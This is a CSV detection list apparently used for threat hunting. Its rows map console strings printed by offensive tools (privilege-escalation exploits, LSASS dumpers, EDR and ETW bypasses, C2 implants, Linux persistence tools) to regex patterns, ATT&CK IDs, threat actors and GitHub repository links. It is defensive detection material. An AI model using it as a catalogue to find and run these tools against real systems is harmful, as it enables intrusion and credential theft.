"*[+] Encrypting The Stack.... *",".{0,1000}\[\+\]\sEncrypting\sThe\sStack\.\.\.\.\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13128"
"*[+] Enumerating ASR Rules on Local System*",".{0,1000}\[\+\]\sEnumerating\sASR\sRules\son\sLocal\sSystem.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#content","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","13129"
"*[+] Enumerating ASR Rules on Remote System *",".{0,1000}\[\+\]\sEnumerating\sASR\sRules\son\sRemote\sSystem\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#content","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","13130"
"*[+] Enumerating driver services...*",".{0,1000}\[\+\]\sEnumerating\sdriver\sservices\.\.\..{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13131"
"*[+] ETW Patched* No Logs No Crime !*",".{0,1000}\[\+\]\sETW\sPatched.{0,1000}\sNo\sLogs\sNo\sCrime\s!.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","#content","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13132"
"*[+] Event Logger is Either NOT running or Already Killed Previously!*",".{0,1000}\[\+\]\sEvent\sLogger\sis\sEither\sNOT\srunning\sor\sAlready\sKilled\sPreviously!.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","13133"
"*[+] Execute shellcode... press enter*",".{0,1000}\[\+\]\sExecute\sshellcode\.\.\.\spress\senter.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","#content","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","13134"
"*[+] Executing technique - hiding scheduled task*",".{0,1000}\[\+\]\sExecuting\stechnique\s\-\shiding\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13135"
"*[+] Exploit Completed*",".{0,1000}\[\+\]\sExploit\sCompleted.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#content","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","13136"
"*[+] Exploit completed. Got a SYSTEM token! :)*",".{0,1000}\[\+\]\sExploit\scompleted\.\sGot\sa\sSYSTEM\stoken!\s\:\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","13137"
"*[+] Exploit successful! *",".{0,1000}\[\+\]\sExploit\ssuccessful!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#content","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","13138"
"*[+] Exploit worked* it should execute your command as SYSTEM!*",".{0,1000}\[\+\]\sExploit\sworked.{0,1000}\sit\sshould\sexecute\syour\scommand\sas\sSYSTEM!.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#content","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13139"
"*[+] Exploitation successful: You have root access*",".{0,1000}\[\+\]\sExploitation\ssuccessful\:\sYou\shave\sroot\saccess.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#content","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","13140"
"*[+] Extracting LAPS password from LDAP*",".{0,1000}\[\+\]\sExtracting\sLAPS\spassword\sfrom\sLDAP.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#content","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","13141"
"*[+] Finding directory to hijack*",".{0,1000}\[\+\]\sFinding\sdirectory\sto\shijack.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13142"
"*[+] Finding Kerberoastable accounts*",".{0,1000}\[\+\]\sFinding\sKerberoastable\saccounts.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13143"
"*[+] Finished Enumerating Shares*",".{0,1000}\[\+\]\sFinished\sEnumerating\sShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13144"
"*[+] Found {LSASS} pid: {pid}*",".{0,1000}\[\+\]\sFound\s\{LSASS\}\spid\:\s\{pid\}.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","13145"
"*[+] Generated successfully! a.dll*",".{0,1000}\[\+\]\sGenerated\ssuccessfully!\sa\.dll.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13146"
"*[+] Generated successfully! a.exe*",".{0,1000}\[\+\]\sGenerated\ssuccessfully!\sa\.exe.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13147"
"*[+] Generated XOR key: *",".{0,1000}\[\+\]\sGenerated\sXOR\skey\:\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13148"
"*[+] Generating .reg payload*",".{0,1000}\[\+\]\sGenerating\s\.reg\spayload.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#content","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","13149"
"*[+] Generating base64 encoded PowerShell script*",".{0,1000}\[\+\]\sGenerating\sbase64\sencoded\sPowerShell\sscript.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","#content","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","13150"
"*[+] GetPEFromRemoteServer*",".{0,1000}\[\+\]\sGetPEFromRemoteServer.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#content","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","13151"
"*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13152"
"*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13153"
"*[+] Git persistence establish*",".{0,1000}\[\+\]\sGit\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13154"
"*[+] Got a S4U logon token (Handle = *",".{0,1000}\[\+\]\sGot\sa\sS4U\slogon\stoken\s\(Handle\s\=\s.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13155"
"*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13156"
"*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13157"
"*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13158"
"*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13159"
"*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13160"
"*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13161"
"*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13162"
"*[+] Got NTLM type 3 AUTH message from * with hostname *",".{0,1000}\[\+\]\sGot\sNTLM\stype\s3\sAUTH\smessage\sfrom\s.{0,1000}\s\swith\shostname\s.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#content","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","13163"
"*[+] Got System!!!\n*",".{0,1000}\[\+\]\sGot\sSystem!!!\\n.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#content","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","13164"
"*[+] hacked the exterior layer of the datacenter mainframe*",".{0,1000}\[\+\]\shacked\sthe\sexterior\slayer\sof\sthe\sdatacenter\smainframe.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13165"
"*[+] Hello from DllMain-PROCESS_ATTACH in Merlin*",".{0,1000}\[\+\]\sHello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#content","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","13166"
"*[+] Hijackable DLL: *",".{0,1000}\[\+\]\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13167"
"*[+] hijacking suid binary*",".{0,1000}\[\+\]\shijacking\ssuid\sbinary.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13168"
"*[+] HiveDump Loaded *",".{0,1000}\[\+\]\sHiveDump\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13169"
"*[+] HiveDump Loaded*",".{0,1000}\[\+\]\sHiveDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13170"
"*[+] HKLM\\SAM is saved successfully*",".{0,1000}\[\+\]\sHKLM\\\\SAM\sis\ssaved\ssuccessfully.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13171"
"*[+] HookChain implanted! \\o/*",".{0,1000}\[\+\]\sHookChain\simplanted!\s\\\\o\/.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13172"
"*[+] HookChain implanted!*",".{0,1000}\[\+\]\sHookChain\simplanted!.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13173"
"*[+] HTTP Client Auth Context swapped with SYSTEM *",".{0,1000}\[\+\]\sHTTP\sClient\sAuth\sContext\sswapped\swith\sSYSTEM\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13174"
"*[+] HTTP reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sHTTP\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13175"
"*[+] ICMP listener started!*",".{0,1000}\[\+\]\sICMP\slistener\sstarted!.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","#content","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","13176"
"*[+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER*",".{0,1000}\[\+\]\sICYGUIDER\'S\sCUSTOM\sSYSCALL\sSHELLCODE\sLOADER.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13177"
"*[+] Impersonating user * to target SPN *",".{0,1000}\[\+\]\sImpersonating\suser\s.{0,1000}\sto\starget\sSPN\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13178"
"*[+] Impersonation as smss.exe*",".{0,1000}\[\+\]\sImpersonation\sas\ssmss\.exe.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13179"
"*[+] Impersonation as winlogon.exe is successful*",".{0,1000}\[\+\]\sImpersonation\sas\swinlogon\.exe\sis\ssuccessful.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#content","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13180"
"*[+] Impersonation successful using token from PID *",".{0,1000}\[\+\]\sImpersonation\ssuccessful\susing\stoken\sfrom\sPID\s.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","#content","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","13181"
"*[+] Importing ticket into a sacrificial process using CreateNetOnly*",".{0,1000}\[\+\]\sImporting\sticket\sinto\sa\ssacrificial\sprocess\susing\sCreateNetOnly.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13182"
"*[+] init.d backdoor establish*",".{0,1000}\[\+\]\sinit\.d\sbackdoor\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13183"
"*[+] Injected the * DLL into process *",".{0,1000}\[\+\]\sInjected\sthe\s.{0,1000}\sDLL\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13184"
